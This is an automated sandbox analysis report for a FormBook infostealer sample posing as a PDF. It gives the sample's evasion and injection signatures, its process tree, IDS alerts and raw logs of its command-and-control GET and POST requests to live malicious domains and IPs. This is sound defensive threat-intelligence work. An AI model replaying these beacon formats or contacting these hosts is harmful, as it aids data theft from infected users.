Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ3978 39793980.pdf.exe

Overview

General Information

Sample name:RFQ3978 39793980.pdf.exe
Analysis ID:1574079
MD5:3979572152f3fb2b98211eeb761309af
SHA1:67e622f51e4c1f128ac003e2132b26a87a582a6d
SHA256:7f3a6082c0ab2b881863c4dfe7328ef497155d2d962fa4a1976a5c26ec1d4e66
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ3978 39793980.pdf.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe" MD5: 3979572152F3FB2B98211EEB761309AF)
    • MSBuild.exe (PID: 4856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • shazRxxmQwU.exe (PID: 5572 cmdline: "C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 5576 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • shazRxxmQwU.exe (PID: 5728 cmdline: "C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", CommandLine: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, NewProcessName: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", ProcessId: 6668, ProcessName: RFQ3978 39793980.pdf.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:48:14.890184+010028554651A Network Trojan was detected192.168.2.449793104.21.95.16080TCP
                2024-12-12T21:49:00.394420+010028554651A Network Trojan was detected192.168.2.44985243.199.54.15880TCP
                2024-12-12T21:49:15.562392+010028554651A Network Trojan was detected192.168.2.449936154.88.22.10580TCP
                2024-12-12T21:49:30.751909+010028554651A Network Trojan was detected192.168.2.449973154.23.184.9580TCP
                2024-12-12T21:49:45.654891+010028554651A Network Trojan was detected192.168.2.450012161.97.142.14480TCP
                2024-12-12T21:50:00.513086+010028554651A Network Trojan was detected192.168.2.45002866.29.149.4680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:48:31.978767+010028554641A Network Trojan was detected192.168.2.44982943.199.54.15880TCP
                2024-12-12T21:48:34.636274+010028554641A Network Trojan was detected192.168.2.44983543.199.54.15880TCP
                2024-12-12T21:48:37.313787+010028554641A Network Trojan was detected192.168.2.44984143.199.54.15880TCP
                2024-12-12T21:49:07.463159+010028554641A Network Trojan was detected192.168.2.449913154.88.22.10580TCP
                2024-12-12T21:49:10.119468+010028554641A Network Trojan was detected192.168.2.449923154.88.22.10580TCP
                2024-12-12T21:49:12.801205+010028554641A Network Trojan was detected192.168.2.449930154.88.22.10580TCP
                2024-12-12T21:49:22.697579+010028554641A Network Trojan was detected192.168.2.449952154.23.184.9580TCP
                2024-12-12T21:49:25.372601+010028554641A Network Trojan was detected192.168.2.449959154.23.184.9580TCP
                2024-12-12T21:49:28.058440+010028554641A Network Trojan was detected192.168.2.449967154.23.184.9580TCP
                2024-12-12T21:49:37.743891+010028554641A Network Trojan was detected192.168.2.449990161.97.142.14480TCP
                2024-12-12T21:49:40.369735+010028554641A Network Trojan was detected192.168.2.449997161.97.142.14480TCP
                2024-12-12T21:49:42.990482+010028554641A Network Trojan was detected192.168.2.450004161.97.142.14480TCP
                2024-12-12T21:49:52.512820+010028554641A Network Trojan was detected192.168.2.45002566.29.149.4680TCP
                2024-12-12T21:49:55.206949+010028554641A Network Trojan was detected192.168.2.45002666.29.149.4680TCP
                2024-12-12T21:49:57.911741+010028554641A Network Trojan was detected192.168.2.45002766.29.149.4680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:48:31.978767+010028563181A Network Trojan was detected192.168.2.44982943.199.54.15880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RFQ3978 39793980.pdf.exeAvira: detected
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RFQ3978 39793980.pdf.exeJoe Sandbox ML: detected
                Source: RFQ3978 39793980.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ3978 39793980.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: shazRxxmQwU.exe, 00000006.00000002.3560481153.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, shazRxxmQwU.exe, 00000008.00000002.3559802937.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004BC530 FindFirstFileW,FindNextFileW,FindClose,7_2_004BC530
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax7_2_004A9EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h7_2_02B104DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49793 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49829 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49829 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49852 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49913 -> 154.88.22.105:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49930 -> 154.88.22.105:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49923 -> 154.88.22.105:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49936 -> 154.88.22.105:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49952 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49973 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49959 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50004 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49990 -> 161.97.142.144:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.030002350.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 154.23.184.95 154.23.184.95
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA= HTTP/1.1Host: www.vayui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1Host: www.327531.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ= HTTP/1.1Host: www.cg19g5.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /1a7n/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=SzU1l/tTxwo1yS+S+GBkbH76tCzhfB/g3n0B8tGNiWfp8ksCFQPrr+3wpvFapjtE3GYokdEi3N4/HopXjg+LHnHi2Aut5Kfel96F5pIIk9Rh6xpkwimlquw= HTTP/1.1Host: www.030002350.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficHTTP traffic detected: GET /a5zo/?YdDTnh=G5VPERT9FhRGJhNIRpmoyXcxrAHSeRDYD481MD187sPPhEeAXpBmYE5VzzyVUlrKlAIY3hSLkfzvU4FcgkoVbU14woS6WrnDZ9EPDWXrZ28nzgl0lvFto1M=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1Host: www.elitevibes.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.327531.buzz
                Source: global trafficDNS traffic detected: DNS query: www.cg19g5.pro
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.030002350.xyz
                Source: global trafficDNS traffic detected: DNS query: www.elitevibes.top
                Source: unknownHTTP traffic detected: POST /iodk/ HTTP/1.1Host: www.327531.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.327531.buzzReferer: http://www.327531.buzz/iodk/Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4Data Raw: 59 64 44 54 6e 68 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 47 52 61 39 66 55 33 49 47 77 44 48 4e 55 38 34 6b 36 7a 48 39 6b 75 35 62 69 51 49 50 75 44 4c 51 3d 3d Data Ascii: YdDTnh=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZGRa9fU3IGwDHNU84k6zH9ku5biQIPuDLQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:48:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlQX96oRm1u4q84MAIlilOHWBs91qFyKR9vQrP1hbBjv9hp0BZTwOnfY7K8czr2GBiyMuEu%2FMdgZwoMFtQAtC7y1n2N3sl0CJfwARvR80YGdpxGph%2BrW6HkQag2sJlPC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1092fb1ff0c470-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1517&rtt_var=758&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=506&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:27 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
